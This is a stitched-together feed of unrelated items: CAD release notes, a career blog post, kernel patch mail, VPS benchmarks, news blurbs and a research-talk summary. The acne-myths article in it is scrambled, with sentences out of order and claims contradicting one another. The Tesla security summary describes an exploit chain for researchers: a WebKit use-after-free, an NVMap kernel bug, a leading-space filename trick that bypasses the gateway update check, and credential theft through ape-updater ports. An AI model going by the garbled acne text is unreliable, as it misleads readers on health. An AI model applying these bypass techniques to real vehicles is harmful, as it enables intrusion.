- A neater, flatter and more intuitive user interface, lets you get rid of long-time design visual fatigue as well as visual interruption.
- Simply draft a cross section and path or different cross sections in different positions, and you can get a 3D model without any lag.
- ZWCAD+ can now directly import graphic snapshots from Google Earth. This new feature allows you to view your final design on a current map.
- Reference Manager helps manage all external resource referred with ease. Super Hatch extends traditional Hatch function by enabling hatching with block, reference and image etc.
- For large projects that require tons of annotations. Flip Dimension Arrow makes cluttered annotations easier to navigate to assist you to quickly spot the note you need.
- For designers who use a 32-bit system, turning on the 3GB switch will allocate more memory to ZWCAD+, which means ZWCAD+ can work more fluently with the new feature, especially with large drawings.
- For users who were previously frustrated by the inability to print raster images like BMP and JPEG, the newly added BMP/JPEG Printers will end that.
What's new in ZWCAD+ 2015 SP2.1
http://www.zwsoft.com/zwcad/what_is_new/#2015_sp2.1

[/center]


          How Do You Start In The Tech Sector?
Career

August 9th, 2018

The tech sector, if you know what you're doing, is easier than most fields to get started in. However, you do have to know what you're doing. In this post, I'm going to step through a series of ways to get started, in case you're not sure.

Sounds easy, right? Well, nothing worthwhile's easy. Now, to be fair, I don't mean "if you know what you're doing" in any patronising or condescending way.

What I mean is that, unlike say being a GP, dentist, civil engineer, corporate lawyer, Queen's Counsel (QC), etc., you don't need to have years of formal training.

What’s more, you don’t need to be registered with an industry group/board before you're allowed to work. These can include the Institute of Chartered Accountants, the Queensland Law Society, or the Queensland Bar Association.

In IT, however, most people whom I've spoken to over the years care far more for what you can do, rather than what a piece of paper says you could do.

Let's Say You Want to Write Code

If you want to write code, then start by learning the basics of a software development language. I'm not going to get into a flame war about one language or another, whether one's better than another or not.

That's for people with too much time on their hands, and for people who are too emotionally invested in their language(s) of choice ― or dare I say, just a bit insecure.

There are a host of languages to choose from, readily available on the three major operating systems (Linux, macOS, and Windows). Some of the most common, where you'll find the most help and documentation, are PHP, Perl, C/C++, Java, Go, Ruby, Python, Haskell, and Lisp. Grab yourself an editor, or an IDE, learn it inside out, and get started learning to write code.

I've linked to a host of excellent online resources for each at the end of the article.

For my part, I prefer any language borne out of C/C++. I've written code in Visual Basic and Cobol and didn't come away from either experience positively.

Once you've learned the basics, start contributing to an open source project! You don't need to be overly ambitious, so the project doesn't need to be a big one.

It could be a small library, such as VIM for Technical Writers that I maintain every so often. It could, however, be the Linux Kernel too, if that's your motivation and you are feeling particularly ambitious.

Regardless of what you choose, by contributing to these projects you'll learn far faster and better than you likely could in any other way. Why?

Because you're working on real projects and have the opportunity to be mentored by people who have years of hands-on experience. You'll get practical, guided experience, the kind you'd likely take years to acquire on your own.

They'll help teach you good habits, best practices, patterns, techniques, and so much more; things you'd likely take ages to hear about, let alone learn.

What's more, you'll become part of a living, breathing community where ― hopefully ― you're encouraged to grow and appreciate the responsibilities and requirements of what it takes to ship software.

But I'd Rather Be a Systems Administrator?

The same approach can be broadly applied. Here’s my suggestion. Install a copy of Linux, BSD, or Microsoft Windows on an old PC or laptop. As you're installing it, have a look around at the tools that are available for it. Hint: open source provides a staggering amount of choice. #justsayin.

Get to know how it's administered, whether via GUI tools (and PowerShell) on Windows, or via the various daemons and their configuration files and command-line tools on Linux and BSD.

Server administration's a pretty broad topic, so it's hard ― if not downright impossible ― to suggest a specific set of tools to learn. I'm encouraging you at this point to get a broad understanding.

Later, if you're keen, you can specialise in a particular area. However, for now, get a broad understanding of:

- Networking
- User and Group Management
- Installation Options and Tooling
- Service/Daemon configuration; and
- Disk Management.

Whether you're on Linux, BSD, or Windows, I've linked to a host of resources at the bottom of the article to help get you started.

Now that you've learned the fundamentals, do something where people can critique you and hold you accountable, such as hosting a website of your own, through a provider such as Digital Ocean or Linode.

The web server you use, whether Apache, NGINX, Lighttpd, or IIS, doesn't matter. Just use one that works well on your OS of choice.

Once you've got it up and running, start building on the day to day tasks required to keep it up and running nicely. Once you've grown some confidence, move on to learning how to improve the site's security and performance, and deployment process.

This can include:

- Optimising the web server, filesystem, and operating system configuration settings for maximum throughput
- Setting up an intrusion detection system (IDS); and
- Dockerising your site

To Go Open Source or Microsoft?

By now you've got a pretty good set of knowledge. However, stop for just a moment, because it's time to figure out if you're going to specialise in open source (Linux/UNIX/BSD) or whether you're going to focus around Microsoft's tools and technologies.

You can become knowledgeable in both, and most developers and systems administrators that I know do have a broad range of knowledge in both. However, I'd suggest that it's easier to build your knowledge in one rather than attempting to learn both.

Depending on the operating system you've been using up until now, it's likely that you've already made your choice. However, it's good to stop and deliberately think about it.

What Do You Do Next?

Now, let's get back to building your skills. What do you do next? If you want to be a sys admin, start looking around for opportunities to help others with their hosting needs.

Don't go all in ― yet. There's no need to rush. Keep stepping up gradually, building your confidence and skills.

If you're not sure of who might need help, have a think about:

- What clubs are you involved in?
- Do you have friends with small businesses that might need support?
- Do you know others who want to learn what you have and need a mentor?

I'm sure that as you start thinking, you'll be able to uncover other ideas and possibilities. Now you have to get out of your comfort zone, contact people and ask them if they need help.

Worst case scenario, they say no. Whatever! Keep going until you find someone who does want help and is willing to take you on.

Regardless of the path that you take, you should feel pretty confident in your foundational skills, because they're based on practical experience.

So, it's time to push further. To do that, I'd suggest contacting a University, a bank, or an insurance provider, if you want to cut your teeth on big installations.

Sure, many other places have big server installations. However, these three are the first that come to mind.

If you are focused on software development, here are a few suggestions:

- Contact software development companies (avoid "digital agencies") and see if they’re hiring.
- Talk to your local chamber of commerce and industry and let them know you’re around and what you do.
- Find the local business networking groups and go to the networking breakfasts.
- Get involved in your local user groups (this goes for sys admins too, btw).
- Start a user group if there isn’t one for what you want to focus on.

In Conclusion

I could go on and on. The key takeaway I'm trying to leave you with is that, if you have practical experience, you'll increase the likelihood of gaining employment.

Any employer I've had of any worth values hands-on experience over a piece of paper any day.

Don't get me wrong; there's nothing wrong with degrees or industry certifications. And for complete transparency:

- I have a Bachelor of Information Technology
- I'm LPIC-1 certified; and
- I’m a Zend (PHP 5) Engineer

However, university qualifications and industry certifications should only reinforce what you already know, and not be something that is used to get your start.

With all that said, I want to encourage you to go down the Open Source path, not Microsoft. But I’m biased, as I’ve been using Linux since 1999.

Regardless, have a chew on all that, and let me know what you think in the comments. I hope that, if you’re keen to get into IT, this helps you do so, and clears up one or more questions and doubts that you may have.

Further Reading Open Source
          pth-order inverse of the Volterra series for multiple-input multiple-output non-linear dynamic systems
A method to determine the pth-order inverse of the Volterra series of multiple-input multiple-output non-linear dynamic systems is presented; it combines time- and frequency-domain techniques to determine the Volterra series of the inverse as a function of the forward system's Volterra series. The method can be used for continuous and discrete time systems. Each operator of non-linear order n of the inverse is a function of the forward system's operators of non-linear order n and lower. It is shown that the pth-order post-inverse is equal to the pth-order preinverse. For the special case that there are no linear cross terms and that the linear memory effects are negligible the kernels of the forward and inverse models are approximately the same. In an example, an approximate inverse model of a model of a concurrent dual band radio frequency amplifier is derived.
          Reboots
     This weekend starting early Saturday morning on August 11th, 2018, (shortly after Midnight) I will be rebooting most of the servers for kernel updates.  The 4.15.0 kernel seems to be particularly problematic although for us it’s not been problematic … Continue reading
          So this means that food does not cause acne.

Improper Diet can cause acne.

So this means that food does not cause acne.  Washing should not be done more than twice a day.  Male or female, American, Chinese or Puerto Rican, they all have gotten it at some points of their lives and may even still have it.  Though a proper and healthy diet is always good for our system, eating like a pig won't make pimples a permanent resident in your face. Wrong, wrong, wrong!  It is true that dirt and dust is unsightly to the face and washing the face is the way to eradicate them but washing often can actually irritate the skin more. Nobody is spared from having it.  So what is this little bundle of horror?  What else but the dreaded pimple!

A pimple, or acne as some people call it, is a dreaded red, swollen bump in the face.

Let's Dispel Some Acne Myths

It is the bane of a person's existence.  And once you have it, prepare to be tormented, embarrassed and humiliated.  Only severe stress treated by the doctor MAY cause acne to erupt only as a side effect of the drugs a person may be taking. But scientific studies have not discovered any connection between these two.  More than twice is enough to strip the face of its natural oils making it dry.  Everybody gets it; everybody hates it.  Many believed that acne is caused by dirt and dust in the face and by washing your face two-three even four times a day or even by scrubbing your face hard can prevent acne.

Acne Myth Number 1

Acne is caused by not washing your face often and not scrubbing it hard enough. Acne commonly occurs in the neck, face, back, shoulders and chest because the sebaceous glands are most abundant in these locations.  It is like a universal language; it is like a rite of passage in a person's life. Also, scrubbing can cause inflammations.

Acne Myth Number 3

When you're stressed, acne tends to pop on your face like popcorn pops from a kernel.  Acne is a result of the hormones' action on the skin's oil glands (the sebaceous glands), which leads to clogged pores and an outbreak of lesions like pimples, blemishes or acne.  Stress is a part of our daily lives and believe it or not it is not a contributing factor to the acne residing in your face.  But the important question we should be asking to be able to avoid this dreaded "disease" is, "What causes this pain in the neck called acne?"

Unfortunately, the causes of acne cannot really be determined (unless your parents or their parents are acne infested too then there's a big, big chance you'll be called acne face by your peers and classmates) thus the acne myths are born!  These myths claim to be the cause of acne. Such a small bump, so much at stake.  We shall enumerate them here.  Not true.  Washing the face should be done as gently as possible with the gentlest facial scrub. So feel free to eat your favourite Lay's, French fries and chocolates anytime.  Certain foods that are oily like French fries and junk food can cause acne to erupt in our face.  If this is the case, consult your doctor immediately.


          Re: [PATCH v3] resource: Merge resources on a node when hot-adding ...
Rashmica Gupta writes: (Summary) wrote:
What is the end-user impact of this patch?
Only architectures/setups that allow the user to remove and add memory of different sizes or different start addresses from the kernel at runtime will potentially encounter the resource fragmentation. Most memory hotplug/hotremove seems to be block or section based, and always adds and removes memory at the same place. Memtrace on ppc is different in that given a size (aligned to a block size), it scans each node and finds a chunk of memory of that size that we can offline and then removes it.
          Re: [PATCH 4/4] drm/meson: convert to the new canvas module
Maxime Jourdan writes: 2018-08-10 0:41 GMT+02:00 Rob Herring <robh@kernel.org>: Documentation/devicetree/bindings/submitting-patches.txt. Hi, What's the standard procedure here ? The reason I kept devicetree+drm changes together is because I didn't want to have floating commits that would break the drm module.
Should I split the changes anyway ?
Maxime

          Re: [PATCH 2/3] perf report: Add raw report support for s390 auxil ...
Michael Ellerman writes: Arnaldo Carvalho de Melo <acme@kernel.org> writes: Thanks for checking!
Yep all building OK here too.
Thanks all.
cheers

          [PATCH] sched/fair : fix typos
Peng Hao writes: (Summary) 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c index 2f0a0be..b7ab23d 100644 --- a/kernel/sched/fair.c +++ b/kernel/sched/fair.c @@ -3315,7 +3315,7 @@ static inline void cfs_se_util_change(struct sched_avg *avg) * * XXX collapse load_sum and runnable_load_sum * - * cfq_rs: + * cfs_rq: * * load_sum = \Sum se_weight(se) * se->avg.load_sum * load_avg = \Sum se->avg.load_avg -- 1.8.3.1
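Review bot: The hunk corrects a single label in the comment block (`cfq_rs:` becomes `cfs_rq:`), so the subject should say "typo" rather than "typos", and "sched/fair :" has a stray space before the colon. Something like "sched/fair: Fix typo in comment" would match what the diff does.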

          Re: [PATCH] perf tools: Check for null when copying nsinfo.
Namhyung Kim writes: Hello,
On Thu, Aug 09, 2018 at 11:53:48PM +0200, Benno Evers wrote: just return NULL for this case as well.
Acked-by: Namhyung Kim <namhyung@kernel.org>
It seems you missed the Signed-off-by though.
Thanks,
Namhyung
2.17.1

          Kernel Updates for Oracle Linux
The following Linux kernel updates have been released for Oracle Linux:
- ELBA-2018-4192: Oracle Linux 6 Unbreakable Enterprise kernel bug fix update
- ELBA-2018-4192: Oracle Linux 7 Unbreakable Enterprise kernel bug fix update
- ELSA-2018-4193 Important: Oracle Linux 6 Unbreakable Enterprise kernel security update
- ELSA-2018-4193 Important: Oracle Linux 7 Unbreakable Enterprise kernel security update...
          5-run 5th too much for Clinton to overcome
A Eugene Helder home run was not enough for the Clinton LumberKings who fell to the Cedar Rapids Kernels 9-4 on Thursday night at Ashford University Field. The loss is the fifth straight for the LumberKings against the Kernels this season.
          Apple has filed a patent for using the iPhone as a passport

Apple has filed a patent for importing important documents into the Secure Enclave, the coprocessor built into its latest-generation SoCs that protects system integrity by encrypting and preserving data even when the kernel is compromised.

Apple's idea is to allow the iPhone (and perhaps the Apple Watch as well) to be used as a formal identification system on a par with a passport. The patent was reported by the site Appleworld.today. The Cupertino company explains that many governments now issue various identification documents capable of storing identifying information that can be used for authentication. The electronic passport, for example, contains a microchip located inside the cover. The microchip makes it possible to uniquely identify the traveller (first name, surname, date of birth and other details) simply by passing the document over an optical reader.

When the passport is presented, the customs officer can identify the user by passing the document over an optical reader. After comparing the information with that stored internally, the officer can confirm the holder's identity and allow them through customs.

Apple believes this procedure can be simplified with the iPhone by using a short-range communication system that transmits details stored in the Secure Enclave. The patent covers various methods of transmitting the data that could replace the identification document while uniquely identifying the citizen: simple, fast and secure mechanisms that would cut waiting times when travelling.

As always, we note that Apple files hundreds of patents every year with the Patent & Trademark Office, and these do not always become actual products and services.


          Linux vulnerability could lead to DDoS attacks
A Linux kernel vulnerability affecting version 4.9 and up could allow an attacker to carry out denial-of-service attacks on a system with an available open port, according to a 6 August security advisory.
          The Ricci Curvature for Noncommutative Three Tori
arXiv:1808.02977

by: Dong, Rui
Abstract:
We compute the Ricci curvature of a curved noncommutative three torus. The computation is done both for conformal and non-conformal perturbations of the flat metric. To perturb the flat metric, the standard volume form on the noncommutative three torus is perturbed and the corresponding perturbed Laplacian is analyzed. Using Connes' pseudodifferential calculus for the noncommutative tori, we explicitly compute the second term of the short time heat kernel expansion for the perturbed Laplacians on functions and on 1-forms. The Ricci curvature is defined by localizing heat traces suitably. Equivalently, it can be defined through special values of localized spectral zeta functions. We also compute the scalar curvatures and compare our results with previous calculations in the conformal case. Finally we compute the classical limit of our formulas and show that they coincide with classical formulas in the commutative case.
          I Rarely Identify With Asians on Screen, but Here's Why Crazy Rich Asians Is So Important

Lately, I've been telling my Asian friends that I'm going to see Crazy Rich Asians for the representation. I say it wryly, but there's a kernel of sincerity in what I'm saying.

I should start out by saying that Hollywood's numbers do make me emotional - mostly frustrated with the past and excited about the future. And before you ask, I'm at best mediocre at math. But the statistics are astounding, obvious to anyone who looks at them. Crazy Rich Asians is the first major American studio project to feature a predominantly Asian cast in 25 years, following the footsteps of 1993's The Joy Luck Club. Here's another crazy showbiz data point: in 2016, three percent of film roles went to Asian actors, while 78 percent went to white actors. As someone who grew up in a predominantly Asian and Latino neighborhood, the demographics of my community looked like those numbers - but reversed. So Crazy Rich Asians is, well, a crazy huge deal.

Many of my Asian friends are ambivalent about the representation hullabaloo around Crazy Rich Asians, and I feel them. I worry that the surface pleasures of representation overshadow other Asian American issues, like mental health and immigration. I also fear that the movie won't directly speak to my California upbringing in a working-class ethnoburb, given that it's about a professor who finds out that her hot boyfriend is a member of Singapore's elite. And then I get anxious about overthinking this, because I'm sure that my white friends don't worry about seeing their lived experiences represented in the lavishness of The Princess Diaries.

Truth be told, I haven't identified with most Asians in film and TV, not Rose Tico from The Last Jedi or even Cristina Yang from Grey's Anatomy. The only Asian character that I've truly resonated with is Diane Nguyen from Bojack Horseman. She's a bookish, introverted feminist who goes through bouts of depression and social anxiety as she navigates her relationships. She's also voiced by Alison Brie, a white actress, who I have otherwise loved. Problematic, I know, which brings me back to why representation is so important.

Opportunities in TV and film are important because they translate into financial and social capital. For Asians in Hollywood, this means that they receive a concrete paycheck for their work and are able to build industry clout. We'll get to see Constance Wu playing other parts and Jon M. Chu directing more features. And, hopefully, more representation will open the doors for not only East Asians, but also Southeast and South Asians in American entertainment. Creative work receives skepticism in general, but it's almost unspoken of when you grow up a first-generation Asian in this country. My parents, Vietnamese immigrants, discouraged me from pursuing the arts when I was younger. They weren't tiger parents, though. They worried that the world would cheat me because I wasn't white.

Representation also matters for character development and transcending stereotypes. In Crazy Rich Asians, Rachel, Peik Lin, and Eleanor are distinct people who aren't passive peasant girls or dragon ladies. Low bar, I know. Still, it's great that there's more than just one Asian female character. None of the actresses portraying them have to carry the weight of stereotypes or expectations of Western audiences in their performances.

The last point that I want to make about representation, perhaps the most superficial one, is that I can't help but feel excited about seeing Asian women in American movies that I actually want to watch, not just projects about ninjas and geishas. When I was younger, my mom and I bonded over watching Sandra Bullock and Meg Ryan romantic comedies on VHS. It's overwhelming to see someone who looks and sounds like me in the leading role. While I'm not going to connect with every Asian woman in movies, it's a huge deal when you grow up knowing one Asian American actress: Lucy Liu.

Wu, who plays the protagonist in Crazy Rich Asians, recently penned an eloquent, heartfelt tweet that resonated with me deeply. She wrote, "I hope that Asian American kids watch CRA and realize that they can be the heroes of their own stories." Her simple message is such a beautiful testament to self-validation. But at the same time, Asians don't need to be heroes. I think that Crazy Rich Asians shows that the presence of Asians in American films can be normal, not just a punchline or a walking stereotype. And that's powerful.


          Docker Container and Vagrant / Virtualbox 101s

Tony Hirst, OUseful Info, Aug 09, 2018


This is a very useful article if you're just getting started with virtualization. Tony Hirst starts with a very simple example, specifically, a Python application called Flask, which is in essence a very simple web server. He then provides a Dockerfile which describes the server environment Flask needs to run. Simple. Stepping it up a notch, he then demonstrates how to set up an API server where the API is defined in a Jupyter notebook and published using the Jupyter Kernel Gateway to again run on Docker. Oy, not so simple (and doesn't seem to work on Zeit). Finally, he shows how to run the Flask demo using another virtualization application, Vagrant, which (it's worth noting) is a lot more complicated. In any case, these can then be run on cloud provisioners - Digital Ocean seems to be the flavour of the month.



          Reddit: Debian or Ubuntu for stability

Hello!

I'm quite new to the Linux world, but have decided to base my new homeserver on Linux, as I'm fed up with Microsoft "quality" updates the last year or so.

I decided to use Debian as I understand this is somewhat more stable than Ubuntu. But then I discovered that I need to run Linux kernel 4.15 for my coffee lake cpu to work optimally (need vaapi).

Will the stability lead of Debian be lost when kernel upgrades are taken into account, and should I just run Ubuntu 18.04 that is born with Linux 4.15? Or will backported Debian kernels + packages still be a more stable setup than Ubuntu server?

submitted by /u/hatwerk
          Linux Kernel Expectations For AMD Threadripper 2
Phoronix: Linux Kernel Expectations For AMD Threadripper 2 If you have already pre-ordered your AMD Threadripper 2990WX processor or just planning...
          systemd.link file does not change ethernet adapter name
Ubuntu 18.04.1, server version kernel: 4.15.18 built from git://kernel.ubuntu.com/ubuntu/ubuntu-bionic.git, with i915 disabled due to hardware problems with the SOC (https://bugs.freedesktop.org/show_bug.cgi?id=106721) Latest updates installed I'm attempting to set up a predictable device name...
          HostBRZ OpenVZ 8GB Benchmark

I recently ordered the VPS-LEB-8GB plan from HostBRZ which can be found at https://lowendbox.com/blog/hostbrz-vps-shared-reseller-hosting-from-2-year/ . Since there aren't any benchmarks around, here is a benchmark below of the VPS if anyone is interested. The only problem seems to be the slow SSD speed..

-------------------------------------------------
 nench.sh v2018.04.14 -- https://git.io/nench.sh
 benchmark timestamp:    2018-08-09 15:17:31 UTC
-------------------------------------------------

Processor:    Intel(R) Xeon(R) CPU E31240 @ 3.30GHz
CPU cores:    4
Frequency:    3292.369 MHz
RAM:          8.0G
Swap:         8.0G
Kernel:       Linux 2.6.32-042stab132.1 x86_64

Disks:
Filesystem     Type      Size Inodes
/dev/simfs     simfs     150G    45M

CPU: SHA256-hashing 500 MB
    2.554 seconds
CPU: bzip2-compressing 500 MB
    7.417 seconds
CPU: AES-encrypting 500 MB
    4.197 seconds

ioping: seek rate
    min/avg/max/mdev = 113.4 us / 231.7 us / 10.2 ms / 506.8 us
ioping: sequential read speed
    generated 2.35 k requests in 5.00 s, 588.8 MiB, 470 iops, 117.7 MiB/s

dd: sequential write speed
    1st run:    193.60 MiB/s
    2nd run:    171.66 MiB/s
    3rd run:    190.73 MiB/s
    average:    185.33 MiB/s

IPv4 speedtests
    your IPv4:    172.245.93.xxxx

    Cachefly CDN:         86.51 MiB/s
    Leaseweb (NL):        8.48 MiB/s
    Softlayer DAL (US):   1.86 MiB/s
    Online.net (FR):      8.30 MiB/s
    OVH BHS (CA):         18.33 MiB/s

No IPv6 connectivity detected
-------------------------------------------------

          HostRush OpenVZ 8GB Benchmark

Since there isn't any benchmark for HostRush, here's a benchmark below for their RushOvz6-SSD plan. I had this VPS for about a month now and I would totally recommend. Great performance and uptime.

-------------------------------------------------
 nench.sh v2018.04.14 -- https://git.io/nench.sh
 benchmark timestamp:    2018-08-09 15:33:14 UTC
-------------------------------------------------

Processor:    Intel(R) Xeon(R) CPU           X5680  @ 3.33GHz
CPU cores:    4
Frequency:    3324.843 MHz
RAM:          8.0G
Swap:         8.0G
Kernel:       Linux 2.6.32-042stab123.9 x86_64

Disks:
ploop12899p1     75G  HDD

CPU: SHA256-hashing 500 MB
    2.400 seconds
CPU: bzip2-compressing 500 MB
    CPU: AES-encrypting 500 MB
    1.215 seconds

ioping: seek rate
    min/avg/max/mdev = 33.9 us / 50.3 us / 23.4 ms / 96.5 us
ioping: sequential read speed
    generated 9.46 k requests in 5.00 s, 2.31 GiB, 1.89 k iops, 473.0 MiB/s

dd: sequential write speed
    1st run:    591.28 MiB/s
    2nd run:    739.10 MiB/s
    3rd run:    727.65 MiB/s
    average:    686.01 MiB/s

IPv4 speedtests
    your IPv4:    172.106.75.xxxx

    Cachefly CDN:         95.04 MiB/s
    Leaseweb (NL):        5.67 MiB/s
    Softlayer DAL (US):   2.27 MiB/s
    Online.net (FR):      4.08 MiB/s
    OVH BHS (CA):         14.00 MiB/s

No IPv6 connectivity detected
-------------------------------------------------

          Testing distributed systems in Go
What is etcd

etcd is a key-value store for the most critical data of distributed systems. Use cases include applications running on Container Linux by CoreOS, which enables automatic Linux kernel updates. CoreOS uses etcd to store semaphore values to make sure only a subset of the cluster is rebooting at any given time. Kubernetes uses etcd to store cluster states for service discovery and cluster management, and it uses the watch API to monitor critical configuration changes.
          SuperStock Kernel V3.0.0 OREO [SM-G93XF / FD / K / L / S / W8]
Samsung Galaxy S7 - Themes, mods and customization
Statistics: 2 posts || 30 views Last post by yoanf26
          Healthy Soul Food – How a Health Crisis is Being Averted by Wellness (Video)
shrimp and grits
*In a recent sketch on SNL, two hosts of a gospel-themed cooking show cooked soul food while talking about people they know dying from heart disease and diabetes. It might come across as funny, but it holds a kernel of truth about soul food and its link to health issues. Soul food – it’s the […]

The post Healthy Soul Food – How a Health Crisis is Being Averted by Wellness (Video) appeared first on EURweb.


          Phoronix: Linux 4.19 Certainly Is Going To Be A Big Kernel
At the end of July I outlined some of the changes queued for Linux 4.19 while since then several more notable additions have become aligned for this next kernel cycle following the one week delay of Linux 4.18...
          Software Engineer - VMware - Palo Alto, CA
1 years of experience in Intel and AMD x86 based processor architecture. 1 years of experience in OS kernel internals, including memory management, resource...
From VMware - Wed, 25 Jul 2018 00:20:47 GMT - View all Palo Alto, CA jobs
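          BlackHat 2018

Foreword

OTA (Over-The-Air) updating is one of the core capabilities in the automotive industry's shift to intelligent, connected vehicles. At this year's Black Hat USA 2018, Tencent Keen Security Lab presented the results of its security research from last year on Tesla's advanced OTA functionality. The work is significant for helping the automotive industry roll out connected-vehicle solutions safely and reliably, and the talk is also the first public disclosure worldwide of information-security research on an automotive advanced driver-assistance system (ADAS; Tesla's system is named Autopilot).

Talk summary

Tencent Keen Security Lab ran attack tests against the Tesla Model S and Model X for two consecutive years, 2016 and 2017, under the preset scenario of attacking remotely without physical contact with the car. At last year's Black Hat USA, Keen Lab researchers presented the specific details covered by Tesla's 2016 acknowledgement of their research and showed attendees a series of security vulnerabilities in Tesla cars, which was well received. In addition, they used a light-and-dance show to demonstrate the impact of attacks using another batch of vulnerabilities found in 2017, but the details of those vulnerabilities were not published.

This year, Tencent Keen Security Lab's talk goes deep into the technical details behind the 2017 Easter-egg video. Besides describing Tesla's cloud-based over-the-air (OTA) update mechanism and showing some new techniques developed for the attack chain, the talk focuses on several serious security vulnerabilities found during testing.

Speaker biographies

Liu Ling (刘令), researcher at Tencent Keen Security Lab, focuses on reverse engineering, vulnerability discovery and vulnerability research, and has taken part in security research on Tesla and other cars many times. He has found several virtualization vulnerabilities in QEMU and XEN, and is also a CTF enthusiast.

Zhang Wenkai (张文凯), researcher at Tencent Keen Security Lab, has taken part in many car security research projects on Tesla, BMW and others. He is mainly responsible for automotive CAN network and firmware analysis, has extensive experience in embedded systems software development, and is familiar with the ECU design process and automotive CAN network structure.

Du Yuefeng (杜岳峰), researcher at Tencent Keen Security Lab, has taken part in Tesla car security research many times and has a strong interest in reverse engineering and malware analysis.

Talk analysis

At this year's Black Hat USA, the Tencent Keen Security Lab team presented the details of the vulnerabilities in the attack chain disclosed in 2017 and showed how those vulnerabilities were used to stage the light show. In addition, the security of autonomous-driving systems has become a new hot topic, and the team also presented its security research on Tesla's driver-assistance module (Autopilot, also called APE).

Finally, the team described how Tesla fixed the vulnerabilities, and stressed once again that overall security can only be raised effectively when security researchers, the security community and device vendors work together.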

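Vulnerability details

Last year we used two vulnerabilities in WebKit to achieve arbitrary code execution in the browser. This year is similar: the whole attack again starts from a WebKit vulnerability.

Some of the hardware units involved in the attack, and how they are connected, are shown in the figure below:

[Figure: hardware units and how they are connected]

The CID has a browser built on the WebKit engine. At the time the vulnerability was reported, the browser was still at version 534.34.

That version of the WebKit engine contains a use-after-free (UAF) vulnerability; the figure below is the PoC code for it:

[Figure: PoC code]

The vulnerability lies in the handling of SVGTransformList elements.

The element holds several SVGTransform instances, and the SVGMatrix structures of those instances are stored in a Vector. When the Initialize or clear method of SVGTransformList is called, the Vector is freed, but the pointer used to access the Matrix in the Vector remains. By exploiting this UAF with a carefully arranged memory layout, the properties of structures such as ArrayStorage and Uint32Array can be used to obtain arbitrary memory read and write, and from there code execution in the browser.

With browser privileges obtained, the next step is to break out of the restrictions that the kernel and other protections place on the browser and get a root shell.

In 2016 we did this by exploiting a vulnerability in the Linux kernel. In 2017, however, Tesla had fixed quite a lot of kernel vulnerabilities, so we had to find a new one.

In the 2017 head-unit firmware, the browser process can access only two files, /dev/nvmap and /dev/nvhost-ctrl, both of which are driver interfaces for communicating with the NVIDIA Tegra chip. In the code behind these two interfaces we found a vulnerability that lets user space decrement by 1 the value at an arbitrary kernel-space memory address.

[Figure: code behind the interfaces]

The vulnerability is in the NVMap driver. When the NVMAP_IOC_PIN_MULT command is handled, the array of pointers supplied by the user is not validated properly: if it contains an invalid structure, that structure's reference count is decremented by 1, and the pointer to the reference count is controlled from user mode. This means user mode can decrement by 1 any memory address in kernel mode. Using this vulnerability together with other gadgets in the kernel, we could read and write arbitrary addresses in kernel space. Tampering with the relevant syscall and AppArmor configuration then yields a root shell.

[Figure: obtaining a root shell]

Getting a root shell shows that the CID is fully compromised; the next target is the gateway.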

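In 2016 we reported some design flaws in the gateway. After receiving the report, Tesla fixed them by adding a signature mechanism that restricts the transfer of update software to the gateway: unsigned update software cannot be transferred to it, so in theory tampered update software cannot be delivered by a non-physical attack.

During a security audit of the new software, however, we found inconsistent behaviour in the update process. As the figure below shows, the gateway's file-transfer protocol restricts direct transfer of the update software, so update software named "boot.img" cannot be transferred to the gateway directly; but the filesystem's rename behaviour and the file-transfer protocol's rename behaviour are inconsistent. The filesystem ignores leading spaces in the target filename, so the target name "\x20boot.img" is understood by the filesystem as "boot.img", which bypasses the filename check on the update software.

[Figure: filesystem]

After flashing our modified update software this way and rebooting the gateway so that it runs the update software, our modified update code executes on the gateway and can plant a backdoor or bypass the original update software's firmware-signature check. We also studied the whole OTA update process. Tesla's OTA update process can be roughly described by the key steps shown in the figure below.

[Figure: OTA process]

After the cloud delivers the firmware download address over Tesla's own handshake protocol, cid-updater on the Tesla CID downloads the firmware from the cloud, decrypts it and verifies its integrity. Then, in a manner similar to A/B Update, the other networked components in the car with substantial computing power (such as the IC and APE) upgrade from the firmware files that cid-updater provides.

[Figure: firmware upgrade]

cid-updater is also responsible for comparing the directory information in the firmware package with the vehicle configuration, generating the release.tgz file from it, and handing that to the gateway together with the update software boot.img mentioned above. The gateway then runs this update software and updates the twenty-odd ECUs connected to it.

To demonstrate our understanding of the vehicle's electrical system as a whole, we customized and demonstrated the Easter-egg feature that Tesla introduced at the end of 2016.

The figure below shows the ECUs that play the main roles in the Easter egg:

[Figure: ECU information]

First, the CID sends a start signal to trigger the sequence. The signal goes to the BCCEN; after initializing the relevant hardware, that controller confirms whether the vehicle is ready to start the Easter egg and waits for the button signal from the key. Once the button is pressed, the CID starts playing music, while the BCCEN and the other ECUs drive their components on the predetermined schedule according to the action tables stored in each ECU.

So, to implement a custom Easter egg, we dynamically modified several checkpoints in the CID, modified the action tables in the ECU firmware, and flashed the modified firmware into the ECUs.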

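Finally, as an exploration of cutting-edge technology, we studied security vulnerabilities in ape-updater. This program is part of Tesla's OTA framework and is responsible for updating the entire APE system.

[Figure: security vulnerabilities in ape-updater]

The program exposes two service ports:

Port 25974 provides an interactive shell and a number of commands that the CID uses for control;

Port 28496 serves the files that other components need through an HTTP server.

[Figure: port information]

The handshake command offered on port 25974 requests a JSON string from the server, which is later given to the install command to parse.

In one particular version of the Tesla APE firmware we found a command named m3-factory-deploy, which can override the JSON returned by handshake so that attacker-supplied JSON gets parsed.

[Figure: the m3-factory-deploy command]

Using the self_serve key in the JSON, the APE can be asked to expose the file /var/etc/saccess/tesla1 through the HTTP server, so its contents can be obtained.

With that as a credential, the command-execution privileges built into ape-updater can be obtained through port 25974, SSH can be re-enabled, and arbitrary programs can be run on the APE as root.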

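Tesla's response

After all of the vulnerabilities above were reported to Tesla, Tesla responded quickly. Its measures included:

Fixing the WebKit vulnerability;

Fixing the kernel vulnerability in NVMap together with NVIDIA;

Fixing the vulnerability in the Gateway.

The team also noted that Tesla keeps improving the security of its systems, for example:

Stricter iptables restrictions;

Further hardening of several key programs in the OTA framework;

Reduced permissions for the tokens in the saccess folder;

Blocking system downgrades;

……

Throughout this process, Tesla's professional security response team and its OTA mechanism played a key role and prevented car owners from being exposed to further threats.

Because of space limits we have only described the type and core principle of each vulnerability; readers interested in this research can find more in our white paper 《穿云拨雾:对特斯拉汽车网关、车身控制模块以及辅助驾驶(Autopilot)ECU的渗透测试》 (Parting the Clouds and Mist: Penetration Testing of the Tesla Gateway, Body Control Module and Driver-Assistance (Autopilot) ECUs).

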